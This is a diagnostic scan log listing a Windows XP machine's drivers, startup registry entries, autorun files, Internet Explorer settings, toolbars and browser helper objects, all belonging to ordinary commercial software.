(ql1080) ql1080 [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\ql1080.sys -> QLogic Corporation [Ver = 3.04 | Size = 40320 bytes | Modified Date = 8/17/2001 11:52:20 AM | Attr =    ]
(ql12160) ql12160 [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\ql12160.sys -> QLogic Corporation [Ver = 7.13.02 (W64) | Size = 45312 bytes | Modified Date = 8/17/2001 11:52:20 AM | Attr =    ]
(ql1280) ql1280 [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\ql1280.sys -> QLogic Corporation [Ver = 7.13.01 (W2K) | Size = 49024 bytes | Modified Date = 8/17/2001 11:52:18 AM | Attr =    ]
(Secdrv) Secdrv [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\secdrv.sys -> Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K. [Ver = 4.03.086 | Size = 20480 bytes | Modified Date = 11/13/2007 3:25:53 AM | Attr =    ]
(sisagp) SIS AGP Bus Filter [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\sisagp.sys -> Silicon Integrated Systems Corporation [Ver = 5.12.01.2010 (xpsp.080413-2111) | Size = 40960 bytes | Modified Date = 4/13/2008 11:36:39 AM | Attr =    ]
(Sparrow) Sparrow [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\sparrow.sys -> Adaptec, Inc. [Ver = v2.0a (ReleaseBinaries.001205-1804) | Size = 19072 bytes | Modified Date = 8/17/2001 12:07:44 PM | Attr =    ]
(symc810) symc810 [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\symc810.sys -> Symbios Logic Inc. [Ver = 5.1.2409.1 (ReleaseBinaries.001205-1804) | Size = 16256 bytes | Modified Date = 8/17/2001 12:07:34 PM | Attr =    ]
(symc8xx) symc8xx [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\symc8xx.sys -> LSI Logic [Ver = 5.1.2409.1 (ReleaseBinaries.001205-1804) | Size = 32640 bytes | Modified Date = 8/17/2001 12:07:36 PM | Attr =    ]
(sym_hi) sym_hi [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\sym_hi.sys -> LSI Logic [Ver = 5.1.2462.0 (Lab01_N.010309-0027) | Size = 28384 bytes | Modified Date = 8/17/2001 12:07:40 PM | Attr =    ]
(sym_u3) sym_u3 [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\sym_u3.sys -> LSI Logic [Ver = 5.1.2462.0 (Lab01_N.010309-0027) | Size = 30688 bytes | Modified Date = 8/17/2001 12:07:42 PM | Attr =    ]
(tmcfw) Trend Micro Common Firewall Service [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\TM_CFW.sys -> Trend Micro Inc. [Ver = 2.6.0.1050 | Size = 280392 bytes | Modified Date = 11/9/2006 4:04:20 PM | Attr =    ]
(tmpreflt) tmpreflt [Kernel | Auto | Running] -> %SystemRoot%\system32\drivers\tmpreflt.sys -> Trend Micro Inc. [Ver = 8.900.0.1001 | Size = 36368 bytes | Modified Date = 7/18/2008 7:08:32 PM | Attr =    ]
(tmtdi) Trend Micro TDI Driver [Kernel | System | Running] -> %SystemRoot%\system32\drivers\tmtdi.sys -> Trend Micro Inc. [Ver = 2.1.0.1050 built by: WinDDK | Size = 73288 bytes | Modified Date = 11/9/2006 4:04:20 PM | Attr =    ]
(tmxpflt) tmxpflt [Kernel | Auto | Running] -> %SystemRoot%\system32\drivers\tmxpflt.sys -> Trend Micro Inc. [Ver = 8.900.0.1001 | Size = 205328 bytes | Modified Date = 7/18/2008 7:08:38 PM | Attr =    ]
(ultra) ultra [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\ultra.sys -> Promise Technology, Inc. [Ver =  1.43 (Build 0603) | Size = 36736 bytes | Modified Date = 8/17/2001 11:52:22 AM | Attr =    ]
(vsapint) vsapint [Kernel | Auto | Running] -> %SystemRoot%\system32\drivers\vsapint.sys -> Trend Micro Inc. [Ver = 8.900-1001 | Size = 1195448 bytes | Modified Date = 7/18/2008 6:51:32 PM | Attr =    ]
(wanatw) WAN Miniport (ATW) [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\wanatw4.sys -> America Online, Inc. [Ver = 8.3.0.0 | Size = 33588 bytes | Modified Date = 1/10/2003 2:13:04 PM | Attr = R  ]

[Registry - Non-Microsoft Only]
< Run [HKEY_LOCAL_MACHINE\] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -> 
Corel Photo Downloader -> %ProgramFiles%\Corel\Corel Photo Album 6\MediaDetect.exe [C:\Program Files\Corel\Corel Photo Album 6\MediaDetect.exe] -> Corel, Inc. [Ver = 6.0.0 (20050831.10) | Size = 106496 bytes | Modified Date = 8/31/2005 11:06:18 AM | Attr =    ]
DLCXCATS -> %SystemRoot%\system32\spool\drivers\w32x86\3\dlcxtime.dll [rundll32 C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\DLCXtime.dll,_RunDLLEntry@16] ->  [Ver = 1.31.0.0 | Size = 106496 bytes | Modified Date = 10/15/2006 10:31:56 PM | Attr =    ]
dlcxmon.exe -> %ProgramFiles%\Dell Photo AIO Printer 926\dlcxmon.exe ["C:\Program Files\Dell Photo AIO Printer 926\dlcxmon.exe"] ->  [Ver = 0.1.25.0 | Size = 292336 bytes | Modified Date = 1/12/2007 9:57:28 AM | Attr =    ]
FaxCenterServer -> %ProgramFiles%\Dell PC Fax\fm3032.exe ["C:\Program Files\Dell PC Fax\fm3032.exe" /s] ->  [Ver = 0.1.35.8 | Size = 312200 bytes | Modified Date = 11/3/2006 3:09:24 PM | Attr =    ]
HostManager -> %CommonProgramFiles%\aol\1210902639\ee\aolsoftware.exe [C:\Program Files\Common Files\AOL\1210902639\ee\AOLSoftware.exe] -> AOL LLC [Ver = 15.5.1.2 | Size = 42032 bytes | Modified Date = 5/25/2007 10:16:08 AM | Attr =    ]
ISUSPM Startup -> %CommonProgramFiles%\InstallShield\UpdateService\ISUSPM.exe ["C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe" -startup] -> InstallShield Software Corporation [Ver = 4, 50, 100, 33433 | Size = 249856 bytes | Modified Date = 6/10/2005 10:44:02 AM | Attr =    ]
MemoryCardManager -> %ProgramFiles%\Dell Photo AIO Printer 926\memcard.exe ["C:\Program Files\Dell Photo AIO Printer 926\memcard.exe"] ->  [Ver = 1.0.21.0 | Size = 304008 bytes | Modified Date = 11/3/2006 3:04:46 PM | Attr =    ]
pccguide.exe -> %ProgramFiles%\Trend Micro\Internet Security 14\pccguide.exe ["C:\Program Files\Trend Micro\Internet Security 14\pccguide.exe"] -> Trend Micro Inc. [Ver = 14.60.0.1195 | Size = 1807960 bytes | Modified Date = 11/21/2006 2:02:24 PM | Attr =    ]
QuickTime Task -> %ProgramFiles%\QuickTime\QTTask.exe ["C:\Program Files\QuickTime\qttask.exe" -atboottime] -> Apple Inc. [Ver = 7.4.5 | Size = 413696 bytes | Modified Date = 3/28/2008 11:37:20 PM | Attr =    ]
TkBellExe -> %CommonProgramFiles%\Real\Update_OB\realsched.exe ["C:\Program Files\Common Files\Real\Update_OB\realsched.exe"  -osboot] -> RealNetworks, Inc. [Ver = 0.1.1.45 | Size = 185896 bytes | Modified Date = 5/15/2008 9:35:25 PM | Attr =    ]
< OptionalComponents [HKEY_LOCAL_MACHINE\] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\ -> 
IMAIL-> Installed = 1 -> 
MAPI-> Installed = 1 -> 
MSFS-> Installed = 1 -> 
< Run [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -> 
AOL Fast Start -> %ProgramFiles%\AOL 9.1\aol.exe ["C:\Program Files\AOL 9.1\AOL.EXE" -b] -> AOL, LLC. [Ver = 9.05.001 | Size = 50528 bytes | Modified Date = 10/27/2007 10:44:58 AM | Attr =    ]
OE_OEM -> %ProgramFiles%\Trend Micro\Internet Security 14\TMAS_OE\TMAS_OEMon.exe ["C:\Program Files\Trend Micro\Internet Security 14\TMAS_OE\TMAS_OEMon.exe"] -> Trend Micro Inc. [Ver = 3.53.0.1041 | Size = 321040 bytes | Modified Date = 8/4/2006 4:15:28 PM | Attr =    ]
swg -> %ProgramFiles%\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe] -> Google Inc. [Ver = 2, 0, 301, 1654 | Size = 68856 bytes | Modified Date = 4/30/2008 8:20:51 AM | Attr =    ]
< All Users Startup Folder > -> C:\Documents and Settings\All Users\Start Menu\Programs\Startup -> 
%AllUsersProfile%\Start Menu\Programs\Startup\Adobe Gamma Loader.lnk -> %CommonProgramFiles%\Adobe\Calibration\Adobe Gamma Loader.exe -> Adobe Systems, Inc. [Ver = 1, 0, 0, 1 | Size = 113664 bytes | Modified Date = 11/4/1999 3:06:48 PM | Attr =    ]
< Tom Startup Folder > -> C:\Documents and Settings\Tom\Start Menu\Programs\Startup -> 
< AppInit_DLLs [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\\AppInit_DLLs -> 
*AppInit_DLLs* -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\\AppInit_Dlls -> 
C:\PROGRA~1\Google\GOOGLE~2\GOEC62~1.DLL -> %ProgramFiles%\Google\Google Desktop Search\GoogleDesktopNetwork3.dll -> Google [Ver = 5.7.801.7324 | Size = 111616 bytes | Modified Date = 4/30/2008 8:20:55 AM | Attr =    ]
*MultiFile Done* -> -> 
< SecurityProviders [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\\SecurityProviders -> 
< Winlogon settings [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon -> 
*Shell* -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell -> 
Explorer.exe -> %SystemRoot%\explorer.exe -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 1033728 bytes | Modified Date = 4/13/2008 5:12:19 PM | Attr =    ]
*MultiFile Done* -> -> 
*UserInit* -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\\UserInit -> 
C:\WINDOWS\system32\userinit.exe -> %SystemRoot%\system32\userinit.exe -> Microsoft Corporation [Ver = 5.1.2600.5512 (xpsp.080413-2113) | Size = 26112 bytes | Modified Date = 4/13/2008 5:12:38 PM | Attr =    ]
*MultiFile Done* -> -> 
*UIHost* -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\\UIHost -> 
logonui.exe -> %SystemRoot%\system32\logonui.exe -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 514560 bytes | Modified Date = 4/13/2008 5:12:24 PM | Attr =    ]
*MultiFile Done* -> -> 
*VMApplet* -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\\VMApplet -> 
rundll32 shell32 -> %SystemRoot%\system32\shell32.dll -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 8461312 bytes | Modified Date = 4/13/2008 5:12:05 PM | Attr =    ]
Control_RunDLL "sysdm.cpl" -> %SystemRoot%\system32\sysdm.cpl -> Microsoft Corporation [Ver = 5.1.2600.5512 (xpsp.080413-2105) | Size = 300544 bytes | Modified Date = 4/13/2008 5:12:41 PM | Attr =    ]
*MultiFile Done* -> -> 
< Winlogon settings [HKEY_CURRENT_USER] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon -> 
< Winlogon\Notify settings [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ -> 
GoToAssist -> %ProgramFiles%\Citrix\GoToAssist\514\g2awinlogon.dll -> Citrix Online, a division of Citrix Systems, Inc. [Ver = 8.0 Build 514 | Size = 10536 bytes | Modified Date = 8/19/2008 5:54:16 PM | Attr =    ]
igfxcui -> %SystemRoot%\system32\igfxdev.dll -> Intel Corporation [Ver = 6.14.10.4820 | Size = 204800 bytes | Modified Date = 7/16/2007 5:45:12 PM | Attr =    ]
< CurrentVersion Policy Settings [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ -> -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\ -> -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\ -> -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{BDEADF00-C265-11D0-BCED-00A0C90AB50F} -> 1 -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} -> 1073741857 -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{0DF44EAA-FF21-4412-828E-260A8728E7F1} -> 32 -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\ -> -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\dontdisplaylastusername -> 0 -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\legalnoticecaption ->  -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\legalnoticetext ->  -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\shutdownwithoutlogon -> 1 -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\undockwithoutlogon -> 1 -> 
< CurrentVersion Policy Settings [HKEY_CURRENT_USER] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ActiveDesktop\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoDriveTypeAutoRun -> 36 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoDriveAutoRun -> FF FF FF FF  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\ -> -> 
< CDROM Autorun Settings > [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom] -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\ -> ->
*DependOnGroup* -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\DependOnGroup -> 
SCSI miniport ->  -> File not found
*MultiFile Done* -> -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\ErrorControl -> 1 -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\Group -> SCSI CDROM Class -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\Start -> 1 -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\Tag -> 2 -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\Type -> 1 -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\DisplayName -> CD-ROM Driver -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\ImagePath -> %SystemRoot%\system32\drivers\cdrom.sys [system32\DRIVERS\cdrom.sys] -> Microsoft Corporation [Ver = 5.1.2600.5512 (xpsp.080413-2108) | Size = 62976 bytes | Modified Date = 4/13/2008 11:40:46 AM | Attr =    ]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\AutoRun -> 1 -> 
*AutoRunAlwaysDisable* -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\AutoRunAlwaysDisable -> 
NEC     MBR-7    ->  -> File not found
NEC     MBR-7.4  ->  -> File not found
PIONEER CHANGR DRM-1804X ->  -> File not found
PIONEER CD-ROM DRM-6324X ->  -> File not found
PIONEER CD-ROM DRM-624X  ->  -> File not found
TORiSAN CD-ROM CDR_C36 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Enum\ -> -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Enum\\0 -> IDE\CdRomHL-DT-ST_DVD+-RW_GSA-H73N_______________B103____\5&384a886&0&0.0.0 -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Enum\\Count -> 3 -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Enum\\NextInstance -> 3 -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Enum\\1 -> USBSTOR\CdRom&Ven_SanDisk&Prod_U3_Cruzer_Micro&Rev_2.18\0000060512123671&1 -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Enum\\2 -> USBSTOR\CdRom&Ven_SanDisk&Prod_U3_Cruzer_Micro&Rev_4.05\0000167A67740D5B&1 -> 
< Drives - Autoruns > ->  -> 
AUTOEXEC.BAT [] -> %SystemDrive%\AUTOEXEC.BAT [ NTFS ] ->  [Ver =  | Size = 0 bytes | Modified Date = 8/10/2004 11:04:08 AM | Attr =    ]
autorun.inf [] -> %SystemDrive%\autorun.inf [ NTFS ] ->  [Folder | Modified Date = 8/24/2008 9:33:31 AM | Attr = RHS]
autorun.inf [[AutoRun]  | open=LaunchU3.exe -a | icon=LaunchU3.exe,0  |  | [Definitions] | Launchpad=LaunchPad.exe | Vtype=2 |  | [CopyFiles] | FileNumber=1 | File1=LaunchPad.zip |  | [Update] | URL=http://u3.sandisk.com/download/lp_installer.asp?custom=1.4.0.4&brand=cruzer |  |  | [Comment] | brand=cruzer | ] -> I:\autorun.inf [ CDFS ] ->  [Ver =  | Size = 277 bytes | Modified Date = 2/12/2007 12:53:42 PM | Attr = R  ]
autorun.inf [[AutoRun]  | open=LaunchU3.exe -a | icon=LaunchU3.exe,0  |  | [Definitions] | Launchpad=LaunchPad.exe | Vtype=1 |  | [CopyFiles] | FileNumber=1 | File1=LaunchPad.zip |  | [Update] | URL=http://u3.sandisk.com/download/lp_installer.asp?custom=1.1.0.2&brand=cruzer |  |  | [Comment] | brand=cruzer | ] -> K:\autorun.inf [ CDFS ] ->  [Ver =  | Size = 279 bytes | Modified Date = 5/11/2006 3:13:39 PM | Attr = R  ]
autorun.inf [] -> L:\autorun.inf [ FAT ] ->  [Folder | Modified Date = 8/24/2008 9:33:32 AM | Attr = RHS]
autorun.inf [] -> M:\autorun.inf [ FAT ] ->  [Folder | Modified Date = 8/24/2008 9:33:32 AM | Attr = RHS]
< HOSTS File > (734 bytes) -> C:\WINDOWS\System32\drivers\etc\Hosts -> 
< Internet Explorer Settings [HKEY_LOCAL_MACHINE\] > -> -> 
HKEY_LOCAL_MACHINE\: Main\\Default_Page_URL -> http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome -> 
HKEY_LOCAL_MACHINE\: Main\\Default_Search_URL -> http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> 
HKEY_LOCAL_MACHINE\: Main\\Local Page -> C:\windows\system32\blank.htm -> 
HKEY_LOCAL_MACHINE\: Main\\Search Page -> http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> 
HKEY_LOCAL_MACHINE\: Main\\Start Page -> http://www.microsoft.com/isapi/redir.dll?prd={SUB_PRD}&clcid={SUB_CLSID}&pver={SUB_PVER}&ar=home -> 
HKEY_LOCAL_MACHINE\: Search\\CustomizeSearch -> http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm -> 
HKEY_LOCAL_MACHINE\: Search\\Default_Search_URL -> http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> 
HKEY_LOCAL_MACHINE\: Search\\SearchAssistant -> http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm -> 
< Internet Explorer Settings [HKEY_CURRENT_USER\] > -> -> 
HKEY_CURRENT_USER\: Main\\Default_Search_URL -> http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> 
HKEY_CURRENT_USER\: Main\\Local Page -> C:\windows\system32\blank.htm -> 
HKEY_CURRENT_USER\: Main\\Search Page -> http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> 
HKEY_CURRENT_USER\: Main\\Start Page -> http://www.yahoo.com/ -> 
HKEY_CURRENT_USER\: SearchURL\\ -> http://home.microsoft.com/access/autosearch.asp?p=%s[Reg Error: Value provider does not exist or could not be read.] -> 
HKEY_CURRENT_USER\: URLSearchHooks\\{EA756889-2338-43DB-8F07-D1CA6FB9C90D} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\AOL\AOL Toolbar 5.0\aoltb.dll [AOLTBSearch Class] -> AOL LLC [Ver = 5.0.17.1 | Size = 1025584 bytes | Modified Date = 3/23/2007 1:35:30 PM | Attr =    ]
HKEY_CURRENT_USER\: ProxyEnable -> 0 -> 
< Trusted Sites Domains [HKEY_LOCAL_MACHINE\] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ -> [Key] 1 domain(s) found. -> 
1 domain(s) and sub-domain(s) not assigned to a zone.
< Trusted Sites Ranges [HKEY_LOCAL_MACHINE\] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ -> [Key] 0 range(s) found. -> 
< Trusted Sites Domains [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ -> [Key] 1 domain(s) found. -> 
objects_aol.com [*] -> Out of zone range - ( 5 ) -> 
1 domain(s) and sub-domain(s) not assigned to a zone.
< Trusted Sites Ranges [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ -> [Key] 0 range(s) found. -> 
< BHO's [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\ -> 
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} [HKEY_LOCAL_MACHINE] -> %CommonProgramFiles%\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [Adobe PDF Reader Link Helper] -> Adobe Systems Incorporated [Ver = 8.0.0.2006102200 | Size = 62080 bytes | Modified Date = 10/22/2006 11:08:42 PM | Attr =    ]
{3049C3E9-B461-4BC5-8870-4C09146192CA} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Real\RealPlayer\rpbrowserrecordplugin.dll [RealPlayer Download and Record Plugin for Internet Explorer] -> RealPlayer [Ver = 1.0.1.57 | Size = 308856 bytes | Modified Date = 5/15/2008 9:35:34 PM | Attr =    ]
{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Java\jre1.5.0_06\bin\ssv.dll [SSVHelper Class] -> Sun Microsystems, Inc. [Ver = 5.0.60.5 | Size = 184423 bytes | Modified Date = 11/10/2005 11:22:12 AM | Attr =    ]
{7C554162-8CB7-45A4-B8F4-8EA1C75885F9} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\AOL\AOL Toolbar 5.0\aoltb.dll [AOL Toolbar Launcher] -> AOL LLC [Ver = 5.0.17.1 | Size = 1025584 bytes | Modified Date = 3/23/2007 1:35:30 PM | Attr =    ]
{AA58ED58-01DD-4d91-8333-CF10577473F7} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Google\Google Toolbar\GoogleToolbar.dll [Google Toolbar Helper] ->  [Ver =  | Size = 193136 bytes | Modified Date = 8/22/2008 6:27:17 PM | Attr =    ]
{AF69DE43-7D58-4638-B6FA-CE66B5AD205D} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Google\GoogleToolbarNotifier\4.1.509.5470\swg.dll [Google Toolbar Notifier BHO] -> Google Inc. [Ver = 4, 1, 509, 5470 | Size = 651760 bytes | Modified Date = 8/22/2008 6:41:39 PM | Attr =    ]
{CA6319C0-31B7-401E-A518-A07C3DB8F777} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Dell\BAE\BAE.dll [CBrowserHelperObject Object] -> Dell Inc. [Ver = 1.2.0.3 | Size = 98304 bytes | Modified Date = 11/9/2006 7:56:48 AM | Attr =    ]
< Internet Explorer ToolBars [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar -> 
{2318C2B1-4965-11d4-9B18-009027A5CD4F} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Google\Google Toolbar\GoogleToolbar.dll [&Google Toolbar] ->  [Ver =  | Size = 193136 bytes | Modified Date = 8/22/2008 6:27:17 PM | Attr =    ]
{DE9C389F-3316-41A7-809B-AA305ED9D922} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\AOL\AOL Toolbar 5.0\aoltb.dll [AOL Toolbar] -> AOL LLC [Ver = 5.0.17.1 | Size = 1025584 bytes | Modified Date = 3/23/2007 1:35:30 PM | Attr =    ]
< Internet Explorer ToolBars [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\ -> 
WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Google\Google Toolbar\GoogleToolbar.dll [&Google Toolbar] ->  [Ver =  | Size = 193136 bytes | Modified Date = 8/22/2008 6:27:17 PM | Attr =    ]
WebBrowser\\{DE9C389F-3316-41A7-809B-AA305ED9D922} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\AOL\AOL Toolbar 5.0\aoltb.dll [AOL Toolbar] -> AOL LLC [Ver = 5.0.17.1 | Size = 1025584 bytes | Modified Date = 3/23/2007 1:35:30 PM | Attr =    ]
< Internet Explorer Extensions [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\ -> 
{08B0E5C0-4FCB-11CF-AAA5-00401C608501}:{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBC} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Java\jre1.5.0_06\bin\NPJPI150_06.dll [Sun Java Console] -> Sun Microsystems, Inc. [Ver = 5.0.60.5 | Size = 69746 bytes | Modified Date = 11/10/2005 11:22:12 AM | Attr =    ]
{08B0E5C0-4FCB-11CF-AAA5-00401C608501}:{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBC} [HKEY_CURRENT_USER] -> %ProgramFiles%\Java\jre1.5.0_06\bin\ssv.dll [Sun Java Console] -> Sun Microsystems, Inc. [Ver = 5.0.60.5 | Size = 184423 bytes | Modified Date = 11/10/2005 11:22:12 AM | Attr =    ]
{3369AF0D-62E9-4bda-8103-B4C75499B578}:{DE9C389F-3316-41A7-809B-AA305ED9D922} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\AOL\AOL Toolbar 5.0\aoltb.dll [AOL Toolbar] -> AOL LLC [Ver = 5.0.17.1 | Size = 1025584 bytes | Modified Date = 3/23/2007 1:35:30 PM | Attr =    ]
< Internet Explorer Extensions [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\ -> 
